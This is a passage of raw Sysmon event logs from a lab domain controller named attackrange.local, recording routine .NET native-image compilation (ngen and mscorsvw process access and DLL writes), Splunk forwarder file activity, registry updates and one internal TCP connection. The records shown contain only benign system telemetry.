b9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018570Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:47.300{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A0FF-60D3-4A02-00000000CF01}6644C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018569Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:47.300{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A0FF-60D3-4A02-00000000CF01}6644C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018568Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:47.222{4DB9351A-A0FD-60D3-4902-00000000CF01}7120NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\4PDCRR76WG\System.Data.Linq.ni.dll.auxMD5=592CDD9EEF56381125F0387E91890DA5,SHA256=D2C21E280753A9B6085400F3387D27E0F9CEF57662C87A7B40E045E5CE2691D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018567Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:47.207{4DB9351A-A0FD-60D3-4902-00000000CF01}7120NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\4PDCRR76WG\System.Data.Linq.ni.dllMD5=1BA7249DC58E3CE9FE2C64256CD87FF6,SHA256=1B987C3B6EDC9BDA8BC267087C678486CC88218C11D36395E2358E85628655E1,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018566Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:00:47.128{4DB9351A-A0FD-60D3-4902-00000000CF01}7120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1bd0-0\System.Data.Linq.dll2021-06-23 21:00:47.128 23542300x800000000000000018584Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:48.753{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46415E96E7E1280B6CC532673D1F890A,SHA256=027098843A0D80384DF4A1D910BCD67B3ED5A111BBAEE49E3D3A3F2589194A06,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018583Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:48.597{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A100-60D3-4C02-00000000CF01}96C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018582Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:48.582{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A100-60D3-4C02-00000000CF01}96C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018581Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:48.582{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A100-60D3-4C02-00000000CF01}96C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018580Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:48.519{4DB9351A-A0FF-60D3-4B02-00000000CF01}6532NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\DOEPHYB5V6\System.Data.OracleClient.ni.dll.auxMD5=316DF0DFAAF08F90FDB56C6B343F3C6F,SHA256=17BC3A1CF83FD0766A1C154F7E14E78A24F8514810C39B2A07BB24AC0152253C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018579Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:48.519{4DB9351A-A0FF-60D3-4B02-00000000CF01}6532NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\DOEPHYB5V6\System.Data.OracleClient.ni.dllMD5=4002F8FE77AEB24ED3BF295A640EFCC4,SHA256=DE85C47AA51241E3A46FF5A6651E71A46D4BAB6854FC33E04A0AD211E7422B49,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018578Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:00:48.488{4DB9351A-A0FF-60D3-4B02-00000000CF01}6532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1984-0\System.Data.OracleClient.dll2021-06-23 21:00:48.488 23542300x800000000000000018577Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:48.316{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=078196ADEFF6A93254C5A4F1F807E9D7,SHA256=D0A4544F4F51DFFAE4009F9311AA353EF532671C6DC3BC57139ACC91BFB457F9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018576Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:48.082{4DB9351A-9DDD-60D3-0D00-00000000CF01}9045116C:\Windows\system32\svchost.exe{4DB9351A-9DDD-60D3-1100-00000000CF01}436C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000018597Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:48.214{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61361-false10.0.1.12-8000- 23542300x800000000000000018596Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:49.769{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8507775ED81A7E4B74D323226718996,SHA256=AF933818572FBA333E557CF45A7A24D4A18CF3CB67B557FB80DE7E56EC60CB34,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000018595Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:00:49.675{4DB9351A-9DDD-60D3-1300-00000000CF01}760C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\ValueBinary Data 13241300x800000000000000018594Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:00:49.675{4DB9351A-9DDD-60D3-1300-00000000CF01}760C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\ValueSizeDWORD (0x00000008) 13241300x800000000000000018593Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:00:49.675{4DB9351A-9DDD-60D3-1300-00000000CF01}760C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\KeySizeDWORD (0x00000000) 13241300x800000000000000018592Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:00:49.675{4DB9351A-9DDD-60D3-1300-00000000CF01}760C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\TimestampQWORD (0x01d76872-0xd864b556) 13241300x800000000000000018591Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:00:49.675{4DB9351A-9DDD-60D3-1300-00000000CF01}760C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\NetworksBinary Data 13241300x800000000000000018590Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:00:49.675{4DB9351A-9DDD-60D3-1300-00000000CF01}760C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\NumNetworksDWORD (0x00000001) 23542300x800000000000000018589Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:49.613{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DED4FA48834C6E07FFC9E02AB952E6CB,SHA256=4FB7E4E68F195F09F1A329C873F8EFC1BEFE5FB7A97119F766F8E576D7464361,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018588Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:49.114{4DB9351A-9DDD-60D3-0D00-00000000CF01}9045116C:\Windows\system32\svchost.exe{4DB9351A-9DDE-60D3-1600-00000000CF01}1292C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018587Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:49.035{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A101-60D3-4D02-00000000CF01}6736C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018586Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:49.004{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A101-60D3-4D02-00000000CF01}6736C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018585Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:49.004{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A101-60D3-4D02-00000000CF01}6736C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018598Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:50.773{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EDBB3A76A414B1743CFB797AE29AD07,SHA256=CE0DF58307D5CE4D94F7AC0C9A7ECDAF6697636CBF37E7028379143406190E5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018608Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:51.775{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98545893EEE27FE848971B20B4E59690,SHA256=A3615C478C3D480CE408EEB059321D4122294E6451C46DB9C0B18D6E53056555,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018607Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:51.382{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A103-60D3-4F02-00000000CF01}5828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018606Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:51.367{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A103-60D3-4F02-00000000CF01}5828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018605Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:51.367{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A103-60D3-4F02-00000000CF01}5828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018604Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:51.257{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A103-60D3-4E02-00000000CF01}3288C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018603Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:51.242{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A103-60D3-4E02-00000000CF01}3288C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018602Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:51.242{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A103-60D3-4E02-00000000CF01}3288C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018601Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:51.148{4DB9351A-A101-60D3-4D02-00000000CF01}6736NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\YNJ5Y7CR6Q\System.Data.Services.ni.dll.auxMD5=628794C4BA7C0332A79627521E7770FF,SHA256=298A377CAB1149A4C5951216FE43079AB9BE75225D12035097981768370ABF54,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018600Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:51.148{4DB9351A-A101-60D3-4D02-00000000CF01}6736NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\YNJ5Y7CR6Q\System.Data.Services.ni.dllMD5=0225BB103AF450817FA0687A90E5A6AA,SHA256=CE4E6F3E72ECC35AC039BF4851176D0BD50D5B464DDFB1E71F37D2898A5B5936,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018599Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:00:51.070{4DB9351A-A101-60D3-4D02-00000000CF01}6736C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1a50-0\System.Data.Services.dll2021-06-23 21:00:51.070 10341000x800000000000000018616Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:52.997{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A104-60D3-5002-00000000CF01}3140C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018615Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 